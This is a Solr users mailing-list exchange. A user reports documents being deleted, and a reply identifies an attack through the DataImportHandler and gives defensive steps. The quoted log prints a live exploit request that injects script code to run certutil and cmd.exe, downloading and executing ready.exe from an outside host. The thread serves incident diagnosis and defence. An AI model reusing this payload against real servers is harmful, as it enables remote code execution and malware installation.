Your system is under attack, something trying to hack into it via
Solr. Possibly a cryptominer or similar. And it is using DIH endpoint
for it.
Shawn explain the most likely cause for Solr actually deleting the
records. I would also suggest:
1) Figure out where the request is coming from and treat it as a
threat. If it is internal, they are infected. If they are external and
consistent, maybe they need to be blocked, etc.
2) Check your system has not been infected already by looking for
weird processes. I guess if you are not on Windows, that particular
line is not a threat, but the attack may have had several methods
3) If you are not using dataimporthandler, remove that from the
solrconfig.xml. Or rename (though that will loose Admin UI interface).
Or firewall block access to it....
Regards,
Alex.
On Thu, 26 Sep 2019 at 08:42, Neha <neha.gu...@uni-jena.de> wrote:
>
> Hello SOLR Users,
>
> Today i have noticed that in my SOLR instance 6.6.0 documents are
> getting automatically deleted.
>
> In SOLR traces i found below lines and seems it is because of this.
>
>
> 2019-09-26 09:01:21.599 INFO (qtp225493257-14) [ x:Ecotron]
> o.a.s.c.S.Request [xyz] webapp=/solr path=/dataimport
> params={cmd.exe+/c+C:/Windows/temp/ready.exe");%0a++++++++++}%0a++]]></script>%0a++<document>%0a++++<entity+name%3D"stackoverflow"%0a++++++++++++url%3D"https://stackoverflow.com/feeds/tag/solr"%0a++++++++++++processor%3D"XPathEntityProcessor"%0a++++++++++++forEach%3D"/feed"%0a++++++++++++transformer%3D"script:poc"+/>%0a++</document>%0a</dataConfig>=&core=atom&debug=true&indent=on&commit=true&name=dataimport&dataConfig=<dataConfig>%0a++<dataSource+type%3D"URLDataSource"/>%0a++<script><![CDATA[%0a++++++++++function+poc(){+java.lang.Runtime.getRuntime().exec("cmd.exe+/c+certutil.exe+-urlcache+-split+-f+http://www.jukesxdbrxd.xyz/ready.exe+C:/Windows/temp/ready.exe&clean=true&wt=json&command=full-import&_=1565530241159&verbose=false}
> status=500 QTime=94
> 2019-09-26 09:01:21.599 ERROR (qtp225493257-14) [ x:Ecotron]
> o.a.s.s.HttpSolrCall
> null:org.apache.solr.handler.dataimport.DataImportHandlerException: Data
> Config problem: XML document structures must start and end within the
> same entity.
>
>
> Also the "dataimport.properties" files of each core is getting updated
> with something like below: -
>
> *stackoverflow.last_index_time=2019-09-26 08\:24\:11*
>
>
> Is there some configuration which i am missing. Request you to please
> help me with this as i am clueless why this is happening.
>
> Thanks for your support!!
>
>
> Regards
>
> Neha Gupta
>
>
